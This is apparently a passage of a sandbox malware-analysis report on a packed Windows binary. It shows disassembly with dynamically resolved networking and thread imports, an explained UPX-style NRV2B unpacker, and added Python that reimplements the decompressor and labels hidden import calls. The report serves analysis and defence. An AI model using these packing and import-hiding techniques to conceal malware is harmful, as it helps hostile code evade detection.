00407970 mov eax, dword ptr [ebp-04h] xrefs 00407967
00407973 pop ebx
00407974 mov esp, ebp
00407976 pop ebp
00407977 ret function end
APIs
  • Sleep.KERNEL32, ref: 00413779
Address Instruction Meta Information
00413778 push eax xrefs 00418672, 00418696, 004196E8, 00418D63
00413779 call 0040628Ch Sleep@KERNEL32.DLL (Hidden Import)
0041377E ret function end
Address Instruction Meta Information
004062E4 push edx xrefs 00412553
004062E5 push eax
004062E6 call 00406204h
004062EB push eax
004062EC call 00406214h
004062F1 ret function end
APIs
  • connect.WS2_32, ref: 00413A04
Address Instruction Meta Information
004139F4 push ebx xrefs 00418520
004139F5 push esi
004139F6 mov ebx, edx
004139F8 mov esi, eax
004139FA mov eax, ebx
004139FC call 0041399Ch
00413A01 push eax
00413A02 push ebx
00413A03 push esi
00413A04 call dword ptr [0042B434h] connect@WS2_32.DLL (Hidden Import)
00413A0A pop esi
00413A0B pop ebx
00413A0C ret function end
Address Instruction Meta Information
0040A158 push ebx xrefs 0040B86D, 0040B880, 0040B8B7, 0040B924, 0040BA66
0040A159 push esi
0040A15A push edi
0040A15B push ecx
0040A15C mov ebx, ecx
0040A15E mov esi, edx
0040A160 mov edi, eax
0040A162 push 00000002h
0040A164 lea eax, dword ptr [esp+04h]
0040A168 push eax
0040A169 push esi
0040A16A push edi
0040A16B call 004061BCh
0040A170 test eax, eax
0040A172 jle 0040A179h
0040A174 mov al, byte ptr [esp]
0040A177 jmp 0040A17Bh
0040A179 mov eax, ebx xrefs 0040A172
0040A17B pop edx xrefs 0040A177
0040A17C pop edi
0040A17D pop esi
0040A17E pop ebx
0040A17F ret function end
APIs
  • CreateThread.KERNEL32, ref: 004043C6
Address Instruction Meta Information
00404390 push ebp xrefs 004131D6
00404391 mov ebp, esp
00404393 push ebx
00404394 push esi
00404395 push edi
00404396 mov edi, ecx
00404398 mov esi, edx
0040439A mov ebx, eax
0040439C mov eax, 00000008h
004043A1 call 004026C8h
004043A6 mov dword ptr [eax], edi
004043A8 mov edx, dword ptr [ebp+10h]
004043AB mov dword ptr [eax+04h], edx
004043AE mov byte ptr [0042C045h], 00000001h
004043B5 mov edx, dword ptr [ebp+08h]
004043B8 push edx
004043B9 mov edx, dword ptr [ebp+0Ch]
004043BC push edx
004043BD push eax
004043BE mov eax, 00404358h
004043C3 push eax
004043C4 push esi
004043C5 push ebx
004043C6 call 00401208h CreateThread@KERNEL32.DLL (Hidden Import)
004043CB pop edi
004043CC pop esi
004043CD pop ebx
004043CE pop ebp
004043CF retn 000Ch function end
APIs
  • WriteFile.KERNEL32, ref: 00402DD2
  • RtlGetLastWin32Error.NTDLL, ref: 00402DD9
Address Instruction Meta Information
00402DA8 push ebp xrefs 00402E48, 00402E68
00402DA9 mov ebp, esp
00402DAB push ecx
00402DAC push ebx
00402DAD push esi
00402DAE push edi
00402DAF mov esi, ecx
00402DB1 mov edi, edx
00402DB3 mov ebx, eax
00402DB5 mov eax, dword ptr [ebp+10h]
00402DB8 movzx edx, word ptr [ebx+04h]
00402DBC and edx, eax
00402DBE cmp eax, edx
00402DC0 jne 00402E1Ah
00402DC2 push 00000000h
00402DC4 lea eax, dword ptr [ebp-04h]
00402DC7 push eax
00402DC8 mov eax, dword ptr [ebx+08h]
00402DCB imul esi
00402DCD push eax
00402DCE push edi
00402DCF mov eax, dword ptr [ebx]
00402DD1 push eax
00402DD2 call dword ptr [ebp+0Ch] WriteFile@KERNEL32.DLL (Hidden Import)
00402DD5 test eax, eax
00402DD7 jne 00402DEAh
00402DD9 call 00401248h RtlGetLastWin32Error@NTDLL.DLL (Hidden Import)
00402DDE call 00402810h
00402DE3 xor eax, eax
00402DE5 mov dword ptr [ebp-04h], eax
00402DE8 jmp 00402E29h
00402DEA mov eax, dword ptr [ebp-04h] xrefs 00402DD7
00402DED xor edx, edx
00402DEF div dword ptr [ebx+08h]
00402DF2 mov dword ptr [ebp-04h], eax
00402DF5 mov eax, dword ptr [ebp+14h]
00402DF8 test eax, eax
00402DFA je 00402E06h
00402DFC mov eax, dword ptr [ebp+14h]
00402DFF mov edx, dword ptr [ebp-04h]
00402E02 mov dword ptr [eax], edx
00402E04 jmp 00402E29h
00402E06 cmp esi, dword ptr [ebp-04h] xrefs 00402DFA
00402E09 je 00402E29h
00402E0B mov eax, dword ptr [ebp+08h]
00402E0E call 00402810h
00402E13 xor eax, eax
00402E15 mov dword ptr [ebp-04h], eax
00402E18 jmp 00402E29h
00402E1A mov eax, 00000067h xrefs 00402DC0
00402E1F call 00402810h
00402E24 xor eax, eax
00402E26 mov dword ptr [ebp-04h], eax
00402E29 mov eax, dword ptr [ebp-04h] xrefs 00402E09, 00402E18, 00402E04, 00402DE8
00402E2C pop edi
00402E2D pop esi
00402E2E pop ebx
00402E2F pop ecx
00402E30 pop ebp
00402E31 retn 0010h function end
APIs
  • LoadLibraryA.KERNEL32, ref: 00437CDA
  • GetProcAddress.KERNEL32, ref: 00437CEF
  • ExitProcess.KERNEL32, ref: 00437D00
  • VirtualProtect.KERNEL32, ref: 00437D1D
  • VirtualProtect.KERNEL32, ref: 00437D32
Strings
  • ble; MSIE 6.0; Windows NT 5.1; StumbleUpon.com 1.760; .NET CLR 1.1.4322) , va: 00426000
Address Instruction Meta Information
00437BB0 pushad
00437BB1 mov esi, 00426000h ASCII "ble; MSIE 6.0; Windows NT 5.1; StumbleUpon.com 1.760; .NET CLR 1.1.4322) "
00437BB6 lea edi, dword ptr [esi-00025000h]
00437BBC mov dword ptr [edi+0002A0C4h], 7D9D6338h
00437BC6 push edi
00437BC7 or ebp, FFFFFFFFh
00437BCA jmp 00437BDAh
00437BD0 mov al, byte ptr [esi] xrefs 00437BE1
00437BD2 inc esi
00437BD3 mov byte ptr [edi], al
00437BD5 inc edi
00437BD6 add ebx, ebx xrefs 00437C85, 00437C6E
00437BD8 jne 00437BE1h
00437BDA mov ebx, dword ptr [esi] xrefs 00437BCA
00437BDC sub esi, FFFFFFFCh
00437BDF adc ebx, ebx
00437BE1 jc 00437BD0h xrefs 00437BD8
00437BE3 mov eax, 00000001h
00437BE8 add ebx, ebx xrefs 00437BF7, 00437C02
00437BEA jne 00437BF3h
00437BEC mov ebx, dword ptr [esi]
00437BEE sub esi, FFFFFFFCh
00437BF1 adc ebx, ebx
00437BF3 adc eax, eax xrefs 00437BEA
00437BF5 add ebx, ebx
00437BF7 jnc 00437BE8h
00437BF9 jne 00437C04h
00437BFB mov ebx, dword ptr [esi]
00437BFD sub esi, FFFFFFFCh
00437C00 adc ebx, ebx
00437C02 jnc 00437BE8h
00437C04 xor ecx, ecx xrefs 00437BF9
00437C06 sub eax, 03h
00437C09 jc 00437C18h
00437C0B shl eax, 08h
00437C0E mov al, byte ptr [esi]
00437C10 inc esi
00437C11 xor eax, FFFFFFFFh
00437C14 je 00437C8Ah
00437C16 mov ebp, eax
00437C18 add ebx, ebx xrefs 00437C09
00437C1A jne 00437C23h
00437C1C mov ebx, dword ptr [esi]
00437C1E sub esi, FFFFFFFCh
00437C21 adc ebx, ebx
00437C23 adc ecx, ecx xrefs 00437C1A
00437C25 add ebx, ebx
00437C27 jne 00437C30h
00437C29 mov ebx, dword ptr [esi]
00437C2B sub esi, FFFFFFFCh
00437C2E adc ebx, ebx
00437C30 adc ecx, ecx xrefs 00437C27
00437C32 jne 00437C54h
00437C34 inc ecx
00437C35 add ebx, ebx xrefs 00437C44, 00437C4F
00437C37 jne 00437C40h
00437C39 mov ebx, dword ptr [esi]
00437C3B sub esi, FFFFFFFCh
00437C3E adc ebx, ebx
00437C40 adc ecx, ecx xrefs 00437C37
00437C42 add ebx, ebx
00437C44 jnc 00437C35h
00437C46 jne 00437C51h
00437C48 mov ebx, dword ptr [esi]
00437C4A sub esi, FFFFFFFCh
00437C4D adc ebx, ebx
00437C4F jnc 00437C35h
00437C51 add ecx, 02h xrefs 00437C46
00437C54 cmp ebp, FFFFF300h xrefs 00437C32
00437C5A adc ecx, 01h
00437C5D lea edx, dword ptr [edi+ebp]
00437C60 cmp ebp, FFFFFFFCh
00437C63 jbe 00437C74h
00437C65 mov al, byte ptr [edx] xrefs 00437C6C
00437C67 inc edx
00437C68 mov byte ptr [edi], al
00437C6A inc edi
00437C6B dec ecx
00437C6C jne 00437C65h
00437C6E jmp 00437BD6h
00437C74 mov eax, dword ptr [edx] xrefs 00437C63, 00437C81
00437C76 add edx, 04h
00437C79 mov dword ptr [edi], eax
00437C7B add edi, 04h
00437C7E sub ecx, 04h
00437C81 jnbe 00437C74h
00437C83 add edi, ecx
00437C85 jmp 00437BD6h
00437C8A pop esi xrefs 00437C14
00437C8B mov edi, esi
00437C8D mov ecx, 000014D0h
00437C92 mov al, byte ptr [edi] xrefs 00437C99, 00437C9E
00437C94 inc edi
00437C95 sub al, E8h
00437C97 cmp al, 01h xrefs 00437CBC
00437C99 jnbe 00437C92h
00437C9B cmp byte ptr [edi], 00000011h
00437C9E jne 00437C92h
00437CA0 mov eax, dword ptr [edi]
00437CA2 mov bl, byte ptr [edi+04h]
00437CA5 shr ax, 0008h
00437CA9 rol eax, 10h
00437CAC xchg ah, al
00437CAE sub eax, edi
00437CB0 sub bl, FFFFFFE8h
00437CB3 add eax, esi
00437CB5 mov dword ptr [edi], eax
00437CB7 add edi, 05h
00437CBA mov al, bl
00437CBC loop 00437C97h
00437CBE lea edi, dword ptr [esi+00035000h]
00437CC4 mov eax, dword ptr [edi] xrefs 00437CE6
00437CC6 or eax, eax
00437CC8 je 00437D06h
00437CCA mov ebx, dword ptr [edi+04h]
00437CCD lea eax, dword ptr [eax+esi+00037218h]
00437CD4 add ebx, esi
00437CD6 push eax
00437CD7 add edi, 08h
00437CDA call dword ptr [esi+00037290h] LoadLibraryA@KERNEL32.DLL (Import)
00437CE0 xchg eax, ebp
00437CE1 mov al, byte ptr [edi] xrefs 00437CFE
00437CE3 inc edi
00437CE4 or al, al
00437CE6 je 00437CC4h
00437CE8 mov ecx, edi
00437CEA push edi
00437CEB dec eax
00437CEC repne scasb
00437CEE push ebp
00437CEF call dword ptr [esi+00037294h] GetProcAddress@KERNEL32.DLL (Import)
00437CF5 or eax, eax
00437CF7 je 00437D00h
00437CF9 mov dword ptr [ebx], eax
00437CFB add ebx, 04h
00437CFE jmp 00437CE1h
00437D00 call dword ptr [esi+000372A4h] ExitProcess@KERNEL32.DLL (Import) xrefs 00437CF7
00437D06 mov ebp, dword ptr [esi+00037298h] VirtualProtect@KERNEL32.DLL (Import) xrefs 00437CC8
00437D0C lea edi, dword ptr [esi-00001000h]
00437D12 mov ebx, 00001000h
00437D17 push eax
00437D18 push esp
00437D19 push 00000004h
00437D1B push ebx
00437D1C push edi
00437D1D call ebp VirtualProtect@KERNEL32.DLL (Import)
00437D1F lea eax, dword ptr [edi+0000021Fh]
00437D25 and byte ptr [eax], 0000007Fh
00437D28 and byte ptr [eax+28h], 0000007Fh
00437D2C pop eax
00437D2D push eax
00437D2E push esp
00437D2F push eax
00437D30 push ebx
00437D31 push edi
00437D32 call ebp VirtualProtect@KERNEL32.DLL (Import)
00437D34 pop eax
00437D35 popad
00437D36 lea eax, dword ptr [esp-80h]
00437D3A push 00000000h xrefs 00437D3E
00437D3C cmp esp, eax
00437D3E jne 00437D3Ah
00437D40 sub esp, FFFFFF80h
00437D43 jmp 00429D88h swap point
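The stub above is a UPX-style unpacker and explains the "Binary may include packed or crypted data" and entropy signatures. The loop from 00437BD0 to 00437C85 is an NRV2B decoder: bits are taken most-significant-first from 32-bit words, with the 'adc ebx, ebx' sentinel marking when a word is exhausted; a 1 bit copies a literal byte; otherwise a gamma-coded match distance follows ('sub eax, 3; jc' selects reuse of the previous distance, and a decoded value of 0xFFFFFFFF after 'xor eax, FFFFFFFFh' ends the stream), then a two-bit or gamma-coded length, with 'cmp ebp, FFFFF300h; adc ecx, 01h' adding one extra byte when the distance exceeds 0xD00. The loop at 00437C92 then undoes the call/jmp filter: every E8/E9 followed by the marker byte 0x11 carries a 3-byte big-endian target that is rewritten as a little-endian rel32 relative to the operand's offset; because 'loop' only runs after a fix, the 0x14D0 in ecx is the number of filtered sites, not a byte count. Afterwards imports are rebuilt with LoadLibraryA/GetProcAddress, the header page is re-protected with VirtualProtect, and control jumps to the original entry point 00429D88. The Python below is an added reimplementation of those two loops written for this page, not code from the sample, the sandbox or UPX; SAMPLE_STREAM and SAMPLE_CODE are constructed inputs encoded by hand to exercise a literal, a back-reference, the end marker and one filtered call.

```python
class UnpackError(ValueError):
    pass


class _BitReader:
    """Bit source as the stub reads it: 32-bit little-endian words, most significant
    bit first. The stub tracks exhaustion with a sentinel bit in ebx ('adc ebx, ebx');
    a plain counter yields the same bit sequence."""

    def __init__(self, src: bytes):
        self.src, self.pos, self.buf, self.left = src, 0, 0, 0

    def bit(self) -> int:
        if self.left == 0:                                    # ebx ran out -> reload from [esi]
            if self.pos + 4 > len(self.src):
                raise UnpackError("bit stream truncated")
            self.buf = int.from_bytes(self.src[self.pos:self.pos + 4], "little")
            self.pos, self.left = self.pos + 4, 32
        self.left -= 1
        b = self.buf >> 31
        self.buf = (self.buf << 1) & 0xFFFFFFFF
        return b

    def byte(self) -> int:                                    # mov al, [esi]; inc esi
        if self.pos >= len(self.src):
            raise UnpackError("byte stream truncated")
        self.pos += 1
        return self.src[self.pos - 1]


def nrv2b_decompress(src: bytes, max_out: int = 1 << 24) -> bytes:
    """NRV2B decoder following 00437BD0..00437C85."""
    r, out, last_off = _BitReader(src), bytearray(), 1      # 'or ebp, -1'
    while True:
        if r.bit():                                           # 1 -> literal byte
            out.append(r.byte())
            continue
        m = 1
        while True:                                           # gamma code: data bit, then stop bit
            m = (m << 1) | r.bit()
            if r.bit():
                break
        if m < 3:                                             # 'sub eax, 3; jc' -> reuse distance
            off = last_off
        else:
            v = (((m - 3) << 8) | r.byte()) & 0xFFFFFFFF      # 'shl eax, 8; mov al, [esi]'
            if v == 0xFFFFFFFF:                               # 'xor eax, -1; je' -> end of stream
                break
            off = last_off = v + 1                            # ebp = ~v = -(v + 1)
        length = r.bit()
        length = (length << 1) | r.bit()
        if length == 0:                                       # two 'adc ecx, ecx' gave 0 -> gamma code
            length = 1
            while True:
                length = (length << 1) | r.bit()
                if r.bit():
                    break
            length += 2
        length += 2 if off > 0xD00 else 1                     # 'cmp ebp, -0xD00; adc ecx, 1'
        if off > len(out):
            raise UnpackError("back-reference before start of output")
        if len(out) + length > max_out:
            raise UnpackError("output limit exceeded")
        for _ in range(length):                               # the stub's dword path copies the same bytes
            out.append(out[-off])
    return bytes(out)


def unfilter_calls(code: bytearray, count: int, marker: int = 0x11) -> int:
    """Undo the call/jmp filter as 00437C92..00437CBC does: for `count` sites, an E8/E9
    followed by `marker` carries a 3-byte big-endian target that becomes a rel32
    relative to the operand's offset. Returns the number of sites fixed."""
    i, fixed = 0, 0
    while fixed < count and i + 4 < len(code):
        op, i = code[i], i + 1
        if op not in (0xE8, 0xE9) or code[i] != marker:
            continue
        target = (code[i + 1] << 16) | (code[i + 2] << 8) | code[i + 3]
        code[i:i + 4] = ((target - i) & 0xFFFFFFFF).to_bytes(4, "little")  # sub eax, edi; add eax, esi
        i, fixed = i + 4, fixed + 1
    return fixed


# constructed inputs (hand-encoded for this example, not taken from the sample)
SAMPLE_STREAM = bytes.fromhex("000000DA" "414201" "00090000" "FF")   # decodes to b"ABAB"
SAMPLE_CODE = bytearray.fromhex("E8 11 00 00 20 90")                  # one filtered call, then nop
```

SAMPLE_STREAM encodes two literals, a match of distance 2 and length 2, and the 0xFFFFFFFF end marker; the bit words 0xDA000000 and 0x00000900 are stored little-endian and the literal, distance and marker bytes are interleaved exactly where the decoder consumes them, which is the layout a dump of the packed section would show.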
APIs
  • inet_ntoa.WS2_32, ref: 00413F9C
  • getnameinfo.WS2_32, ref: 00413FF4
Address Instruction Meta Information
00413F58 push ebp xrefs 004181AA
00413F59 mov ebp, esp
00413F5B add esp, FFFFFFDCh
00413F5E push ebx
00413F5F push esi
00413F60 push edi
00413F61 xor ecx, ecx
00413F63 mov dword ptr [ebp-04h], ecx
00413F66 mov dword ptr [ebp-08h], ecx
00413F69 mov esi, eax
00413F6B lea edi, dword ptr [ebp-24h]
00413F6E mov ecx, 00000007h
00413F73 rep movsd
00413F75 mov edi, edx
00413F77 xor eax, eax
00413F79 push ebp
00413F7A push 0041402Ah
00413F7F push dword ptr fs:[eax]
00413F82 mov dword ptr fs:[eax], esp
00413F85 mov eax, edi
00413F87 call 004043DCh
00413F8C movzx eax, word ptr [ebp-24h]
00413F90 call 00413B74h
00413F95 test al, al
00413F97 jne 00413FB3h
00413F99 push dword ptr [ebp-20h]
00413F9C call dword ptr [0042B41Ch] inet_ntoa@WS2_32.DLL (Hidden Import)
00413FA2 mov ebx, eax
00413FA4 test ebx, ebx
00413FA6 je 0041400Fh
00413FA8 mov eax, edi
00413FAA mov edx, ebx
00413FAC call 004045D4h
00413FB1 jmp 0041400Fh
00413FB3 mov ebx, 00000401h xrefs 00413F97
00413FB8 mov esi, 00000020h
00413FBD lea eax, dword ptr [ebp-04h]
00413FC0 mov edx, ebx
00413FC2 call 004049A8h
00413FC7 lea eax, dword ptr [ebp-08h]
00413FCA mov edx, esi
00413FCC call 004049A8h
00413FD1 push 0000000Ah
00413FD3 push esi
00413FD4 mov eax, dword ptr [ebp-08h]
00413FD7 call 00404878h
00413FDC push eax
00413FDD push ebx
00413FDE mov eax, dword ptr [ebp-04h]
00413FE1 call 00404878h
00413FE6 push eax
00413FE7 lea eax, dword ptr [ebp-24h]
00413FEA call 0041399Ch
00413FEF push eax
00413FF0 lea eax, dword ptr [ebp-24h]
00413FF3 push eax
00413FF4 call dword ptr [0042B454h] getnameinfo@WS2_32.DLL (Hidden Import)
00413FFA test eax, eax
00413FFC jne 0041400Fh
00413FFE mov eax, dword ptr [ebp-04h]
00414001 call 00404878h
00414006 mov edx, eax
00414008 mov eax, edi
0041400A call 004045D4h
0041400F xor eax, eax xrefs 00413FFC, 00413FA6, 00413FB1
00414011 pop edx
00414013 pop ecx Count = 2
00414014 mov dword ptr fs:[eax], edx
00414017 push 00414031h
0041401C lea eax, dword ptr [ebp-08h] xrefs 0041402F
0041401F mov edx, 00000002h
00414024 call 00404400h
00414029 ret function end
APIs
  • socket.WS2_32, ref: 00418257
Strings
  • IPv6, va: 004182DC
Address Instruction Meta Information
004181D8 push ebx xrefs 00418401, 00418512
004181D9 push esi
004181DA push edi
004181DB add esp, FFFFFFE4h
004181DE mov esi, edx
004181E0 lea edi, dword ptr [esp]
004181E3 mov ecx, 00000007h
004181E8 rep movsd
004181EA mov ebx, eax
004181EC mov byte ptr [ebx+000001A8h], 00000000h
004181F3 xor eax, eax
004181F5 mov dword ptr [ebx+0000019Ch], eax
004181FB xor eax, eax
004181FD mov dword ptr [ebx+000001A0h], eax
00418203 mov eax, ebx
00418205 call 0041949Ch
0041820A cmp dword ptr [ebx+000001B4h], FFFFFFFFh
00418211 jne 004182CBh
00418217 lea eax, dword ptr [ebx+6Ch]
0041821A call 004043DCh
0041821F mov byte ptr [ebx+0000008Bh], 00000000h
00418226 cmp word ptr [esp], 0017h
0041822B sete al
0041822E mov byte ptr [ebx+0000008Eh], al
00418234 mov eax, ebx
00418236 mov edx, dword ptr [eax]
00418238 call dword ptr [edx+000000A4h]
0041823E push eax
0041823F mov eax, ebx
00418241 mov edx, dword ptr [eax]
00418243 call dword ptr [edx+000000A0h]
00418249 push eax
0041824A movzx eax, word ptr [esp+08h]
0041824F push eax
00418250 mov eax, dword ptr [0042B7C4h] 0042B444
00418255 mov eax, dword ptr [eax]
00418257 call eax socket@WS2_32.DLL (Hidden Import)
00418259 mov esi, eax
0041825B mov dword ptr [ebx+000001B4h], esi
00418261 inc esi
00418262 jne 00418273h
00418264 mov eax, dword ptr [0042B930h] 0042B3D0
00418269 mov eax, dword ptr [eax]
0041826B call eax WSAGetLastError@WS2_32.DLL (Hidden Import, via slot 0042B3D0 filled at 00414754)
0041826D mov dword ptr [ebx+000001B8h], eax
00418273 lea eax, dword ptr [ebx+00000095h] xrefs 00418262
00418279 call 00413994h
0041827E lea edx, dword ptr [ebx+00000095h]
00418284 mov eax, dword ptr [ebx+000001B4h]
0041828A call 00413984h
0041828F mov eax, ebx
00418291 call 0041952Ch
00418296 cmp byte ptr [ebx+0000008Eh], 00000000h
0041829D je 004182AFh
0041829F mov ecx, 004182DCh ASCII "IPv6"
004182A4 mov dl, 02h
004182A6 mov eax, ebx
004182A8 call 00419E70h
004182AD jmp 004182BDh
004182AF mov ecx, 004182ECh xrefs 0041829D
004182B4 mov dl, 02h
004182B6 mov eax, ebx
004182B8 call 00419E70h
004182BD mov eax, ebx xrefs 004182AD
004182BF call 00417FFCh
004182C4 mov eax, ebx
004182C6 call 00419F28h
004182CB add esp, 1Ch xrefs 00418211
004182CE pop edi
004182CF pop esi
004182D0 pop ebx
004182D1 ret function end
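The socket wrapper above does not import WS2_32 statically. It calls through a pointer table, either directly (`call dword ptr [0042B41Ch]` in the address-to-string routine before it) or in two steps (`mov eax, [0042B7C4h]` with the tool's meta column showing the slot 0042B444, then `mov eax, [eax]` and `call eax`). That table is filled by the loader at 00414670 further down this page: LoadLibraryA("ws2_32.dll"), then one GetProcAddress per name, each `push <name>` followed by a `mov dword ptr [<slot>], eax`. The report labels some of these call sites but not all of them, so the Python below is an added example, not part of the report or of the sample: it rebuilds the slot-to-name table from the loader's listing and labels indirect calls through it, using the meta column to follow the double indirection. The input lines are copied from this page; the helper names are my own.

```python
import re

# Constructed sample input: lines copied from this report (the ws2_32 loader at 00414670
# and two of its callers), trimmed to the columns the script needs. A real run would feed
# the report's whole disassembly section.
LOADER_LINES = """\
0041481F push 00414B7Ch ASCII "inet_ntoa"
00414824 mov eax, dword ptr [ebx]
00414826 push eax
00414827 call 004061D4h
0041482C mov dword ptr [0042B41Ch], eax
00414747 push 00414AFCh ASCII "WSAGetLastError"
0041474C mov eax, dword ptr [ebx]
0041474E push eax
0041474F call 004061D4h
00414754 mov dword ptr [0042B3D0h], eax
004148E5 push 00414BE4h ASCII "socket"
004148EA mov eax, dword ptr [ebx]
004148EC push eax
004148ED call 004061D4h
004148F2 mov dword ptr [0042B444h], eax
"""

CALLER_LINES = """\
00413F9C call dword ptr [0042B41Ch]
00418250 mov eax, dword ptr [0042B7C4h] 0042B444
00418255 mov eax, dword ptr [eax]
00418257 call eax
00418264 mov eax, dword ptr [0042B930h] 0042B3D0
00418269 mov eax, dword ptr [eax]
0041826B call eax
"""

PUSH_NAME = re.compile(r'^push [0-9A-F]{8}h ASCII "([^"]+)"$')
STORE_SLOT = re.compile(r"^mov dword ptr \[([0-9A-F]{8})h\], eax$")
MEM_OPERAND = re.compile(r"\[([0-9A-F]{8})h\]")
META_VALUE = re.compile(r"\] ([0-9A-F]{8})$")   # resolved pointer printed after the operand


def split_line(line: str) -> tuple[int, str]:
    addr, _, text = line.partition(" ")
    return int(addr, 16), text.strip()


def build_slot_table(listing: str) -> dict[int, str]:
    """Pair each pushed export name with the next 'mov [slot], eax' that stores the
    GetProcAddress result: slot address -> export name."""
    slots: dict[int, str] = {}
    pending = None
    for line in listing.splitlines():
        _, text = split_line(line)
        m = PUSH_NAME.match(text)
        if m:
            pending = m.group(1)
            continue
        m = STORE_SLOT.match(text)
        if m and pending is not None:
            slots[int(m.group(1), 16)] = pending
            pending = None
    return slots


def resolve_calls(listing: str, slots: dict[int, str]) -> dict[int, str]:
    """Label indirect calls through the table: 'call dword ptr [slot]' and the
    'mov eax, [ptr] slot / mov eax, [eax] / call eax' shape seen in the report."""
    resolved: dict[int, str] = {}
    loaded = None  # export whose slot was just loaded into eax
    for line in listing.splitlines():
        addr, text = split_line(line)
        mem = MEM_OPERAND.search(text)
        meta = META_VALUE.search(text)
        if text.startswith("call dword ptr") and mem and int(mem.group(1), 16) in slots:
            resolved[addr] = slots[int(mem.group(1), 16)]
            loaded = None
        elif text.startswith("mov eax, dword ptr [eax]"):
            continue  # dereferencing the slot keeps the function pointer in eax
        elif text.startswith("mov eax, dword ptr") and meta and int(meta.group(1), 16) in slots:
            loaded = slots[int(meta.group(1), 16)]
        elif text == "call eax" and loaded is not None:
            resolved[addr] = loaded
            loaded = None
        elif text.startswith(("mov eax", "call", "pop eax", "xor eax")):
            loaded = None  # eax clobbered or consumed by something else
    return resolved


def annotate(listing: str, slots: dict[int, str]) -> list[str]:
    """Return the caller listing with resolved names appended, report-style."""
    names = resolve_calls(listing, slots)
    out = []
    for line in listing.splitlines():
        addr, _ = split_line(line)
        out.append(f"{line}  ; {names[addr]}@WS2_32.DLL" if addr in names else line)
    return out


if __name__ == "__main__":
    table = build_slot_table(LOADER_LINES)
    print("\n".join(annotate(CALLER_LINES, table)))
```

Fed the whole report, the same table labels every `call dword ptr [0042B3xx]`/`[0042B4xx]` site (the loader continues past the end of this section with the remaining names, stored the same way). The `wship6.dll` string in the loader's string list suggests a second lookup for the three IPv6 names (getaddrinfo, freeaddrinfo, getnameinfo) when ws2_32 lacks them; that code is not shown here, so treat it as an inference to confirm in the full listing.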
APIs
  • ResumeThread.KERNEL32, ref: 004134F4
Address Instruction Meta Information
004134EC push ebx xrefs 00422544, 0041327A, 004132C2
004134ED push esi
004134EE mov ebx, eax
004134F0 mov eax, dword ptr [ebx+04h]
004134F3 push eax
004134F4 call 0040626Ch ResumeThread@KERNEL32.DLL (Hidden Import)
004134F9 mov esi, eax
004134FB test esi, esi
004134FD setnl dl
00413500 mov eax, ebx
00413502 call 00413344h
00413507 dec esi
00413508 jne 0041350Eh
0041350A mov byte ptr [ebx+0Eh], 00000000h
0041350E pop esi xrefs 00413508
0041350F pop ebx
00413510 ret function end
APIs
    • QueryPerformanceCounter.KERNEL32, ref: 00402A20
    • GetTickCount.KERNEL32, ref: 00402A34
  • Sleep.KERNEL32, ref: 0042975A
Address Instruction Meta Information
004291FC push ebp
004291FD mov ebp, esp
004291FF mov ecx, 0000000Eh
00429206 push 00000000h Count = 2
00429208 dec ecx
00429209 jne 00429204h
0042920B push ecx
0042920C push ebx
0042920D push esi
0042920E push edi
0042920F xor edx, edx
00429211 push ebp
00429212 push 00429798h
00429217 push dword ptr fs:[edx]
0042921A mov dword ptr fs:[edx], esp
0042921D mov byte ptr [eax+0Fh], 00000001h
00429221 mov dl, 01h
00429223 mov eax, dword ptr [0040FD08h] 0040FD54
00429228 call 004036D8h
0042922D mov dword ptr [0042DA80h], eax
00429232 mov dword ptr [ebp-0Ch], 000000B4h
00429239 mov eax, dword ptr [ebp-0Ch]
0042923C mov dword ptr [ebp-08h], eax
0042923F xor eax, eax
00429241 mov dword ptr [0042DA6Ch], eax
00429246 xor eax, eax
00429248 mov dword ptr [0042DA90h], eax
0042924D xor eax, eax
0042924F mov dword ptr [0042DA94h], eax
00429254 xor eax, eax
00429256 mov dword ptr [0042DA98h], eax
0042925B call 00402A1Ch
00429260 xor eax, eax xrefs 0042975F
00429262 push ebp
00429263 push 00429748h
00429268 push dword ptr fs:[eax]
0042926B mov dword ptr fs:[eax], esp
0042926E mov dl, 01h
00429270 mov eax, dword ptr [0040FD08h] 0040FD54
00429275 call 004036D8h
0042927A mov dword ptr [ebp-04h], eax
0042927D lea edx, dword ptr [ebp-1Ch]
00429280 mov eax, dword ptr [0042DA88h] 00961DD8
00429285 call 00429030h
0042928A mov edx, dword ptr [ebp-1Ch]
0042928D mov eax, dword ptr [ebp-04h]
00429290 mov ecx, dword ptr [eax]
00429292 call dword ptr [ecx+2Ch]
00429295 lea edx, dword ptr [ebp-20h]
00429298 mov eax, dword ptr [ebp-04h]
0042929B mov ecx, dword ptr [eax]
0042929D call dword ptr [ecx+1Ch]
004292A0 mov edx, dword ptr [ebp-20h]
004292A3 mov eax, 004297B0h
004292A8 call 00404960h
004292AD cmp eax, 03h
004292B0 jne 00429724h
004292B6 xor eax, eax
004292B8 push ebp
004292B9 push 004292F9h
004292BE push dword ptr fs:[eax]
004292C1 mov dword ptr fs:[eax], esp
004292C4 lea eax, dword ptr [ebp-24h]
004292C7 push eax
004292C8 lea edx, dword ptr [ebp-28h]
004292CB mov eax, dword ptr [ebp-04h]
004292CE mov ecx, dword ptr [eax]
004292D0 call dword ptr [ecx+1Ch]
004292D3 mov eax, dword ptr [ebp-28h]
004292D6 mov ecx, 00000001h
004292DB xor edx, edx
004292DD call 004048D8h
004292E2 mov eax, dword ptr [ebp-24h]
004292E5 call 00422574h
004292EA mov dword ptr [0042DA68h], eax
004292EF xor eax, eax
004292F1 pop edx
004292F3 pop ecx Count = 2
004292F4 mov dword ptr fs:[eax], edx
004292F7 jmp 00429303h
00429303 xor eax, eax xrefs 004292F7
00429305 push ebp
00429306 push 00429349h
0042930B push dword ptr fs:[eax]
0042930E mov dword ptr fs:[eax], esp
00429311 lea eax, dword ptr [ebp-2Ch]
00429314 push eax
00429315 lea edx, dword ptr [ebp-30h]
00429318 mov eax, dword ptr [ebp-04h]
0042931B mov ecx, dword ptr [eax]
0042931D call dword ptr [ecx+1Ch]
00429320 mov eax, dword ptr [ebp-30h]
00429323 mov ecx, 00000001h
00429328 mov edx, 00000002h
0042932D call 004048D8h
00429332 mov eax, dword ptr [ebp-2Ch]
00429335 call 00422574h
0042933A mov dword ptr [0042DA8Ch], eax
0042933F xor eax, eax
00429341 pop edx
00429343 pop ecx Count = 2
00429344 mov dword ptr fs:[eax], edx
00429347 jmp 0042935Dh
0042935D lea eax, dword ptr [ebp-34h] xrefs 00429347
00429360 push eax
00429361 lea edx, dword ptr [ebp-38h]
00429364 mov eax, dword ptr [ebp-04h]
00429367 mov ecx, dword ptr [eax]
00429369 call dword ptr [ecx+1Ch]
0042936C mov eax, dword ptr [ebp-38h]
0042936F call 00404678h
